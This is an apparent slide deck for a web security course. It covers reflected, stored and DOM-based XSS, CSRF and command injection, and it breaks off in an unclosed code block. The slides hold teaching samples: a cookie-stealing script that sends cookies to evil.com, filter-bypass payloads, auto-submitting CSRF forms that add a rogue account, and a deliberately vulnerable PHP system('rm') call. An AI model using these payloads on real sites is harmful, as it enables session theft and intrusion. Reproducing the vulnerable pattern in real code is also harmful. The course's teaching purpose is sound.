<!DOCTYPE html>
<html>
  <head>
    <title>websec</title>
    <meta charset="utf-8">
    <style>
		// one small step for man
		/* latin-ext */
		@font-face {
		  font-family: 'Yanone Kaffeesatz';
		  font-style: normal;
		  font-weight: 400;
		  src: local('Yanone Kaffeesatz Regular'), local('YanoneKaffeesatz-Regular'), url(YDAoLskQQ5MOAgvHUQCcLV83L2yn_om9bG0a6EHWBso.woff2) format('woff2');
		  unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF;
		}
		/* latin */
		@font-face {
		  font-family: 'Yanone Kaffeesatz';
		  font-style: normal;
		  font-weight: 400;
		  src: local('Yanone Kaffeesatz Regular'), local('YanoneKaffeesatz-Regular'), url(YDAoLskQQ5MOAgvHUQCcLfGwxTS8d1Q9KiDNCMKLFUM.woff2) format('woff2');
		  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000;
		}
		/* latin */
		@font-face {
		  font-family: 'Droid Serif';
		  font-style: normal;
		  font-weight: 400;
		  src: local('Droid Serif'), local('DroidSerif'), url(https://fonts.gstatic.com/s/droidserif/v6/0AKsP294HTD-nvJgucYTaI4P5ICox8Kq3LLUNMylGO4.woff2) format('woff2');
		  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000;
		}
		/* latin */
		@font-face {
		  font-family: 'Droid Serif';
		  font-style: normal;
		  font-weight: 700;
		  src: local('Droid Serif Bold'), local('DroidSerif-Bold'), url(https://fonts.gstatic.com/s/droidserif/v6/QQt14e8dY39u-eYBZmppwYlIZu-HDpmDIZMigmsroc4.woff2) format('woff2');
		  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000;
		}
		/* latin */
		@font-face {
		  font-family: 'Droid Serif';
		  font-style: italic;
		  font-weight: 400;
		  src: local('Droid Serif Italic'), local('DroidSerif-Italic'), url(https://fonts.gstatic.com/s/droidserif/v6/cj2hUnSRBhwmSPr9kS5898u2Q0OS-KeTAWjgkS85mDg.woff2) format('woff2');
		  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000;
		}
		/* cyrillic-ext */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 400;
		  src: local('Ubuntu Mono'), local('UbuntuMono-Regular'), url(ViZhet7Ak-LRXZMXzuAfkTTOQ_MqJVwkKsUn0wKzc2I.woff2) format('woff2');
		  unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F;
		}
		/* cyrillic */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 400;
		  src: local('Ubuntu Mono'), local('UbuntuMono-Regular'), url(ViZhet7Ak-LRXZMXzuAfkTUj_cnvWIuuBMVgbX098Mw.woff2) format('woff2');
		  unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
		}
		/* greek-ext */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 400;
		  src: local('Ubuntu Mono'), local('UbuntuMono-Regular'), url(ViZhet7Ak-LRXZMXzuAfkUbcKLIaa1LC45dFaAfauRA.woff2) format('woff2');
		  unicode-range: U+1F00-1FFF;
		}
		/* greek */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 400;
		  src: local('Ubuntu Mono'), local('UbuntuMono-Regular'), url(ViZhet7Ak-LRXZMXzuAfkWo_sUJ8uO4YLWRInS22T3Y.woff2) format('woff2');
		  unicode-range: U+0370-03FF;
		}
		/* latin-ext */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 400;
		  src: local('Ubuntu Mono'), local('UbuntuMono-Regular'), url(ViZhet7Ak-LRXZMXzuAfkSYE0-AqJ3nfInTTiDXDjU4.woff2) format('woff2');
		  unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF;
		}
		/* latin */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 400;
		  src: local('Ubuntu Mono'), local('UbuntuMono-Regular'), url(ViZhet7Ak-LRXZMXzuAfkY4P5ICox8Kq3LLUNMylGO4.woff2) format('woff2');
		  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000;
		}
		/* cyrillic-ext */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 700;
		  src: local('Ubuntu Mono Bold'), local('UbuntuMono-Bold'), url(ceqTZGKHipo8pJj4molytp6iIh_FvlUHQwED9Yt5Kbw.woff2) format('woff2');
		  unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F;
		}
		/* cyrillic */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 700;
		  src: local('Ubuntu Mono Bold'), local('UbuntuMono-Bold'), url(ceqTZGKHipo8pJj4molyti_vZmeiCMnoWNN9rHBYaTc.woff2) format('woff2');
		  unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
		}
		/* greek-ext */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 700;
		  src: local('Ubuntu Mono Bold'), local('UbuntuMono-Bold'), url(ceqTZGKHipo8pJj4molytiFaMxiho_5XQnyRZzQsrZs.woff2) format('woff2');
		  unicode-range: U+1F00-1FFF;
		}
		/* greek */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 700;
		  src: local('Ubuntu Mono Bold'), local('UbuntuMono-Bold'), url(ceqTZGKHipo8pJj4molytgalQocB-__pDVGhF3uS2Ks.woff2) format('woff2');
		  unicode-range: U+0370-03FF;
		}
		/* latin-ext */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 700;
		  src: local('Ubuntu Mono Bold'), local('UbuntuMono-Bold'), url(ceqTZGKHipo8pJj4molytujkDdvhIIFj_YMdgqpnSB0.woff2) format('woff2');
		  unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF;
		}
		/* latin */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: normal;
		  font-weight: 700;
		  src: local('Ubuntu Mono Bold'), local('UbuntuMono-Bold'), url(ceqTZGKHipo8pJj4molytolIZu-HDpmDIZMigmsroc4.woff2) format('woff2');
		  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000;
		}
		/* cyrillic-ext */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: italic;
		  font-weight: 400;
		  src: local('Ubuntu Mono Italic'), local('UbuntuMono-Italic'), url(KAKuHXAHZOeECOWAHsRKAxNcqx07xvyppV96iFRdwiM.woff2) format('woff2');
		  unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F;
		}
		/* cyrillic */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: italic;
		  font-weight: 400;
		  src: local('Ubuntu Mono Italic'), local('UbuntuMono-Italic'), url(KAKuHXAHZOeECOWAHsRKA-fhZE2STYI3KzBGzrJG_ik.woff2) format('woff2');
		  unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
		}
		/* greek-ext */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: italic;
		  font-weight: 400;
		  src: local('Ubuntu Mono Italic'), local('UbuntuMono-Italic'), url(KAKuHXAHZOeECOWAHsRKA26cj8HaeL2jS4NIBPr3RFo.woff2) format('woff2');
		  unicode-range: U+1F00-1FFF;
		}
		/* greek */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: italic;
		  font-weight: 400;
		  src: local('Ubuntu Mono Italic'), local('UbuntuMono-Italic'), url(KAKuHXAHZOeECOWAHsRKA9cKKn5Xt5n-nnvkqIBMZms.woff2) format('woff2');
		  unicode-range: U+0370-03FF;
		}
		/* latin-ext */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: italic;
		  font-weight: 400;
		  src: local('Ubuntu Mono Italic'), local('UbuntuMono-Italic'), url(KAKuHXAHZOeECOWAHsRKA0_0lycXMw8PhobHtu2Qgco.woff2) format('woff2');
		  unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF;
		}
		/* latin */
		@font-face {
		  font-family: 'Ubuntu Mono';
		  font-style: italic;
		  font-weight: 400;
		  src: local('Ubuntu Mono Italic'), local('UbuntuMono-Italic'), url(KAKuHXAHZOeECOWAHsRKA8u2Q0OS-KeTAWjgkS85mDg.woff2) format('woff2');
		  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000;
		}

      body { font-family: 'Droid Serif'; }
      h1, h2, h3 {
        font-family: 'Yanone Kaffeesatz';
        font-weight: normal;
      }
      .remark-code, .remark-inline-code { font-family: 'Ubuntu Mono'; }
	  img.ns {
		  box-shadow: none !important;
	  }
	  img {
		  box-shadow: 0 0 40px #ccc;
	  }
		.c {
		display: block;
		margin-left: auto;
		margin-right: auto;
		}
    </style>
  </head>
  <body>
    <textarea id="source">

# Boot USB - Choose "Live USB Persistence"
<img class="c" src="kalip.jpg" width="80%">
---
class: center, middle
# Web Security
Magnus Klaaborg Stubman

slides: http://dumpco.re/websec
---
# Agenda

1. Cross-Site Scripting (XSS)
2. Cross-Site Request Forgery (CSRF)
3. Command injection
4. SQL injection (SQLi)
5. Authentication and Session Management
6. Third party components
7. Broken access control
8. Sensitive Data Exposure
9. Insufficient Attack Protection
---
class: center, middle
# XSS
Cross-site scripting
---
# Goal
Inject bad stuff in user's browsers
---
# For fun
```html
<h1>MOHAHAHAH YOU HAVE BEEN HACKED!!!</h1>
```
<img src="mohaha.png" width="100%">
---
# To get money
```html
<h1>We have stolen all your stuff! Send a ton of $$$$</h1>
```
<img src="steal.png" width="100%">
---
# To spread malware
```html
<script>window.location = "http://evil.com/prophecy.zip";</script>
```
<img src="download.png" width="50%" class="c">
---
# What does this do? and why?
```html
<script>
a = '<img src="http://evil.com/collect.gif?x=' + escape(document.cookie) + '" />';
document.write(a);
</script>
```
---
# Attacker's apache access_log

```log
71.8.51.256 - - [07/Feb/2013:20:41:17 +0700] "GET /collect.gif?x=I_MaWpDC7126YmBO52ZSh1A
sd--KmqQ%3b+__qca%3dP0-729728865-1504205877976%3b+_ga%3dGA1.2.1238627493.1504205878%3b+_
gid%3dGA1.2.689 323835.1504205878 HTTP/1.1" 200 285 "http://evil.com/collect.gif?x=__gad
s%3dID%3d75b533976fe567ab%3aT%3d1504205885%3aS%3dALNI_MaWpDC7126YmBO52ZSh1Asd--KmqQ%3b+_
_qca%3dP0-729728865-1504205877976%3b+_ga%3dGA1.2.1238627493.1504205878%3b+_gid%3dGA1.2.6
89323835.1504205878" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.17 (KHTML, like Gecko
) Chrome/24.0.1312.57 Safari/537.17"
```
---
# Terminology
XSS payload == thing the attacker wants to inject into your browser
---
# Types of XSS
1. Reflected
2. Stored (persistent)
3. DOM-based
---
class: center, middle
# Reflected XSS
---
# Reflected XSS
XSS payload is sent to the server, which returns it back in it's response.

After that, it's gone.


<img class="ns" src="reflected.png" width="100%">
---
# Reflected XSS

Example:
```
http://example.com/search=<script>alert("xss");</script>
```
HTTP request:
```http
GET /search=<script>alert("xss");</script> HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
```
HTTP response:
```http
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1270
Connection: close

<!doctype html>
<html>
...
Your search for "<script>alert("xss");</script>" gave 0 results.
```
---
class: center, middle
# Stored XSS (persistent XSS)
---
# Stored XSS (persistent XSS)
Two step attack:

1. XSS payload is sent to the server, which stores it.
2. Victim user visits website, which serves the payload to the victim

Note: XSS payload is stored, potentially forever, in some form of database.

<img class="ns" src="stored.png" width="100%">
---
# Stored XSS (persistent XSS)
Step 1: inject payload on http://example.com/addYourName.php

<img src="postxss.png">
```http
POST /addYourName.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
...
fname=Kevin%3Cscript%3Ealert%28%22xss%22%29%3B%3C%2Fscript%3E&lname=
```
Step 2: on http://example.com/ViewAllNames.php
```http
HTTP/1.1 200 OK
Content-Type: text/html
...
<p>Names of visitors:</p>
<ul>
  <li>Robert</li>
  <li>John</li>
  <li>Kevin<script>alert("xss");</script><li>
</ul>
```
---
class: middle, center
# XSS mitigation
XSS prevention
---
class: middle, center
# Why not just remove "&lt;" and "&gt;"?
a.k.a. filtering
---
class: middle, center
# Let's try !
---
# XSS mitigation
Assume that "&lt;" and "&gt;" are blacklisted:

```html
<?php
$input = $_GET["name"];
$input = str_replace("<", "", $input);
$input = str_replace(">", "", $input);
?>
<input type="text" value="<?php echo $input; ?>">
```

payload: `&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x22;&#x78;&#x73;&#x73;&#x22;&#x29;&#x3b;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;` will become:

```html
<input type="text" value="scriptalert("xss");/script")>
```
Is it possible to get around this filter?
---
# Simple XSS filter bypass
Payload: 
```
" onmouseover="alert('xss')" x="
```
Result:
```html
<input type="text" value="" onmouseover="alert('xss')" x="">
```
---
# UTF-7 charset XSS filter bypass
Only worked if site didn't declare charset, or declared charset as utf-7:
```html
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>
```
XSS payload:
```html
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
```
source: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
---
# VBScript XSS filter bypass
XSS payload
```html
<IMG SRC='vbscript:msgbox("XSS")'>
```
source: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
---
# Regular expression XSS filter bypass
&#x26;&#x23;&#x78;&#x34;&#x36;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x66;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x35;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x36;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x66;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x64;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x65;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x37;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x38;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x66;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x65;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x35;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x38;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x63;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x63;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x66;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x37;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x63;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x34;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x34;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x65;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x35;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x66;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x65;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x37;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x63;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x63;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x66;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x37;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x63;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x34;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x34;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x34;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x65;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x65;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x65;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x37;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x66;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x36;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x35;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x37;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x35;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x38;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x36;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x63;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x35;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x66;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x63;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x30;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x62;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x65;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x65;&#x3b;&#x26;&#x23;&#x78;&#x35;&#x64;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x62;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x66;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x61;&#x3b;
```html
<SCRIPT a=">" SRC="httx://evil.com/a.js"></SCRIPT>
```

source: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
---
# Exercise
1. Start "Google Gruyere" - check readme.txt
2. Find XSS!
---
class: center, middle
# Question
What does it mean for the attacker that the XSS payload is stored, potentially forever, on the website?
---
# Answer

- the attack is launched against all visiting users, not just one
- the attack is more easily detected by other users and administrators

---
class: center, middle
# DOM-based XSS
---
# DOM-based XSS
XSS payload is never sent to the server.

Example:
```
http://example.com/search#<script>alert("xss");</script>
```
HTTP request:
```http
GET /search HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Connection: close
```

<img src="dom.png" width="100%" class="ns">
---
# DOM-based XSS example
```http
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1270
Connection: close

<html>
  <script>

    // Today, browsers include the pound sign in
    // the hash and encode the entire thing
	
    var removePound = location.hash.substring(1);
    var unescaped = unescape(removePound);

    eval(unescaped);

  </script>
</html>
```
---
# jQuery 1.8.3 bug
```
http://dumpco.re/lab/jqueryxss/#<img src=x onerror=alert('xss')>
```

```html
<html>
  <script src="jquery-1.8.3.min.js"></script>
  <script>

    // this used to work:
    // $(location.hash);

    // Today, browsers include the pound sign in the hash and encode the 
    // entire thing,so the following is needed to demo the bug:

    var removePound = location.hash.substring(1);
    var unescaped = unescape(removePound);

    $(unescaped);

  </script>
</html>
```
---
class: middle, center
# Worst case scenario: from XSS to RCE (remote code execution)
---
# From XSS to RCE
If the victim user can upload files, then so can the attacker!

Example XSS payload for Wordpress, with two steps:

1. grab anti-CSRF nonce
2. Use Wordpress functionality to upload a malicious PHP webshell

full source: https://github.com/magnusstubman/presentations/blob/master/evil/wordpressxss2rce.js
---
# Demo
<a href="xss2rce.mov">download xss2rce.mov</a>

https://youtu.be/oifGQlO-PqI
<iframe width="560" height="315" src="https://www.youtube.com/embed/oifGQlO-PqI" frameborder="0" allowfullscreen></iframe>
---
# If you could pick one...
Which type of XSS would you pick if you wanted to steal an administrator's account? and why?

- Reflected
- Stored
- DOM-based
---
class: middle, center
# XSS mitigation
---
# XSS mitigation

We want to turn:

<img src="alertxss.png" width="70%">

into:

<img src="outputencoding.png" width="70%">

---
# XSS mitigation
We achieve this by turning:
```html
<script>alert("xss");</script>
```
into:
```html
&amp;lt;script&amp;gt;alert(&amp;quot;xss&amp;quot;);&amp;lt;/script&amp;gt;
```
HTML entities: https://dev.w3.org/html5/html-author/charref
---
# XSS mitigation

C#
```c#
HttpUtility.HtmlEncode() // NOT HttpUtility.HtmlAttributeEncode()
```
PHP
```php
echo htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
```
JSP
```jsp
<p><c:out value="${bean.userControlledValue}"></p>
<p><input name="foo" value="${fn:escapeXml(param.foo)}"></p>
```
Dangerous JavaScript functions:
```javascript
eval()
document.write()
document.writeln()
element.innerHTML = "..."
element.outerHTML = "..."
```
---
class: middle, center
# Exotic ideas
---
# Exotic ideas
- spy on people through their webcam - https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API/Taking_still_photos
- bitcoin mining - https://github.com/derjanb/hamiyoca
- portscanning http://www.andlabs.org/tools/jsrecon.html 
- BeeF - Browser exploitation framework - http://beefproject.com/
---
# Conclusion
- We can steal sessions
- We can do anything the victim can do - even get RCE
- Always output encode - filters can (almost always) be bypassed
- XSS may be more dangerous in the future as browsers become more powerful
---
class: middle, center
# CSRF
Cross-Site Request Forgery
---
# CSRF
Goal: Performing action on behalf of a victim user
---
# Change password
<img src="changepassword.png" width="100%">
---
# Add rogue account
<img src="addhacker.png" width="65%">
---
class: middle
Transfer $5000 to account number 7777
```
http://example.com/transferMoney.aspx?toAccount=7777&amp;amount=5000
```
---
class: middle
Delete your account
```
http://example.com/deleteAccount.php?areyousure=yes
```
---
# POST requests
```html
<form action="/addUser.php" method="post">
  username:<br>
  <input type="text" name="username">
  password:<br>
  <input type="text" name="password">
  <input type="submit" value="Add user">
</form> 
```
<img src="adduser.png" width="40%">
---
# POST requests
Automatic form post
```html
<form action="http://example.com/addUser.php" method="POST">
  <input type="hidden" name="username" value="hacker" />
  <input type="hidden" name="password" value="haxhaxhax" />
  <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
```
---
# POST requests
Automatic AJAX POST request
```html
<script>
	var xhr = new XMLHttpRequest();
	xhr.open("POST", "http:\/\/example.com\/addUser.php", true);
	xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
	xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
	xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
	xhr.withCredentials = true;

	var body = "username=hacker&password=haxhaxhax";
	var aBody = new Uint8Array(body.length);

	for (var i = 0; i < aBody.length; i++) {
	  aBody[i] = body.charCodeAt(i); 
	}

	xhr.send(new Blob([aBody]));
</script>
```
---
class: middle
<img src="mallink.png" width="100%">
---
class: middle
<img src="mallink2.png" width="100%">
---
class: middle
<img src="csrfshort.png" width="100%">
---
class: middle
```
http://example.com/transferMoney.aspx?fromAccount=4444&amp;toAccount=7777&amp;amount=5000
```
<img src="downarrow.png" width="5%" style="box-shadow:none;">
<!--<img src="downarrow.png" width="5%" style="box-shadow:none;display: block; margin-left: auto; margin-right: auto;">-->
```
http://goo.gl/ZnVP5n
```
```http
HTTP/1.1 301 Moved Permanently
Location: http://example.com/transferMoney.aspx?fromAccount=4444&toAccount=7777&amount=5000
...
```
---
# Exercise
1. Start "Google Gruyere" - check readme.txt
2. Find CSRF!
---
class: middle, center
# CSRF mitigation
---
# CSRF mitigation

1. Confirmation, or
2. anti-CSRF tokens
(or both)
---
# CSRF mitigation

<img src="confirm.png" width="50%" class="c">
---
# CSRF mitigation

```html
<form>
	<input type="hidden" name="antiCSRFToken" value="55hHf4ueowUIFHiEW2">
	…
</form>

```

anti-CSRF token can NOT be a cookie. Why?
---
# Conclusion

- Functionality is vulnerable to CSRF if no confirmation or anti-CSRF tokens exist
- Both GET and POST can be used
- Anti-CSRF token must be something which is *not* automatically added by the browser in requests, and cannot be guessed by attackers
- Attackers can bypass anti-CSRF token protection if an XSS exists
---
class: middle, center
# Command injection
---
# Command injection
Goal: Execute system commands on the server
---
# Command injection

<img src="deletefile.png" width="40%">

```html
<p>Enter filename to delete</p>
<form method="get">
   <input type="text" name="filename">
   <input type="submit">
</form>
<?php
   if (isset( $_GET['filename'] ) ){
       echo "Deleting file...";
       system("rm '" . $_GET['filename'] . "'");
   }
?>
```
---
<img src="phpsystem.png" width="100%">
---
# Command injection
<img src="deletefile2censored.png" width="100%">
```php
